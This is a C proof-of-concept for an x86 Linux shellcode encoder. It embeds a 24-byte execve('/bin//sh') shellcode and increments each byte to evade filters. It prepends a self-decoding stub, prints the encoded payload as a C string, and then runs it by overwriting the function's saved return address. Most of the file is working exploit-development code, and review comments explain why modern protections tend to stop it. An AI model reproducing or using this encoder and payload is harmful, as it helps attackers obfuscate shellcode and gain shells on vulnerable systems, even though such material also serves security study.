/*
 * Proof-of-concept to test the decoder
 *
 * Rodrigo Rubira Branco <rodrigo@kernelhacking.com>
*/

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

/*
 *
 * DEC Shellcode encoder
 * 
 */

/* Forward declaration; execute() is defined after main() in this file. */
void execute(char *  data);

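/*
 * Test harness for the DEC decoder stub.
 *
 * Adds 1 to every byte of the embedded payload, patches the payload length
 * into the decoder stub, joins stub + encoded payload in a heap buffer,
 * prints that buffer as a C string literal, and finally passes it to
 * execute().
 *
 * Returns 0 if control comes back from execute(), 1 if allocation fails.
 */
int main(void) {

  char decoder[] =
   "\xeb\x0b"   //                   jmp    d <label3>
   "\x5e"                  //    popl   %esi
   "\x6a\x00"              //     pushl  $0x0
   "\x59"                  //    popl   %ecx
   "\xfe\x0e"                   // decb   (%esi)
   "\x46"                  //    incl   %esi
   "\xe2\xfb"               //    loopl  6 <label2>
   "\xeb\x05"               //    jmp    12 <label4>
   "\xe8\xf0\xff\xff\xff"; //          calll  2 <label1>

  /*  Copyright (c) Ramon de Carvalho Valle                          July 2003  */
  /*  x86/linux shellcode                                                       */
  char shellcode[] =          /*  24 bytes                          */
    "\x31\xc0"              /*  xorl    %eax,%eax                 */
    "\x50"                  /*  pushl   %eax                      */
    "\x68\x2f\x2f\x73\x68"  /*  pushl   $0x68732f2f               */
    "\x68\x2f\x62\x69\x6e"  /*  pushl   $0x6e69622f               */
    "\x89\xe3"              /*  movl    %esp,%ebx                 */
    "\x50"                  /*  pushl   %eax                      */
    "\x53"                  /*  pushl   %ebx                      */
    "\x89\xe1"              /*  movl    %esp,%ecx                 */
    "\x99"                  /*  cltd                              */
    "\xb0\x0b"              /*  movb    $0x0b,%al                 */
    "\xcd\x80"              /*  int     $0x80                     */
    ;

  const int key = 1;      /* value added to every payload byte */
  const int per_row = 15; /* bytes printed per output line */
  int col = per_row;      /* start "full" so the first byte opens a line */
  char *end;
  size_t payload_len = strlen(shellcode);
  size_t dec_len;
  size_t total;
  size_t i;

  /* strlen() returns size_t, so the matching conversion is %zu, not %d. */
  printf("\n shellcode: %zu\n", payload_len);

  for (i = 0; i < payload_len; i++) {
    shellcode[i] = (char)(shellcode[i] + key);
  }

  /*
   * Byte 4 of the stub is the 0x00 operand shown in the listing above; it
   * receives the payload length. This is a narrowing store into one byte.
   * It must happen before strlen(decoder) is taken, because until it is
   * overwritten that 0x00 terminates the string after four bytes.
   */
  decoder[4] = (char)payload_len;
  dec_len = strlen(decoder);
  total = dec_len + payload_len;

  /*
   * Reserve one extra byte for the terminator and check the allocation.
   * The buffer is filled with memcpy: calling strcat() on freshly malloc'd
   * memory reads uninitialised bytes while searching for an existing NUL.
   */
  end = malloc(total + 1);
  if (end == NULL) {
    fprintf(stderr, "malloc failed\n");
    return 1;
  }
  memcpy(end, decoder, dec_len);
  memcpy(end + dec_len, shellcode, payload_len);
  end[total] = '\0';

  printf("\nDecoder: %zu Shellcode: %zu Result %zu\n", dec_len, payload_len, strlen(end));

  printf("\n\nchar shellcode[] =\n");

  for (i = 0; i < total; ++i) {
    if (col >= per_row) {
      if (i) printf("\"\n");
      printf("\t\"");
      col = 0;
    }
    ++col;
    printf("\\x%02x", ((unsigned char *)end)[i]);
  }

  printf("\";\n");

  /*
   * Flush after the final line so the whole listing is written out before
   * execute() is called; control may not return here normally.
   */
  fflush(stdout);

  /*
   * NOTE(review): `end` is heap memory. Where the heap is mapped
   * non-executable (NX/DEP), the transfer attempted by execute() is
   * expected to fault rather than run the buffer.
   */
  execute(end);
  free(end);
  return 0;
}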


/*
 * Store the address held in `data` into a stack slot located two int-sized
 * positions above the local variable `ret`.
 *
 * NOTE(review): presumably that slot is this function's saved return
 * address under a 32-bit x86 frame built with a frame pointer and without
 * a stack protector, so that returning from execute() continues at `data`.
 * Confirm against the build this was written for.
 *
 * The write lands outside the `ret` object, which is undefined behaviour in
 * C; the result depends entirely on compiler, flags and ABI. Stack canaries
 * and non-executable data mappings are the usual reasons it fails on
 * current toolchains.
 */
void execute(char *data) {
  
  int *ret;
  /* Take the address of `ret` itself and step two ints past it. */
  ret = (int *)&ret + 2;
  /* The cast narrows the pointer to int, dropping bits wherever pointers
     are wider than int. */
  (*ret) = (int)data;
  
}




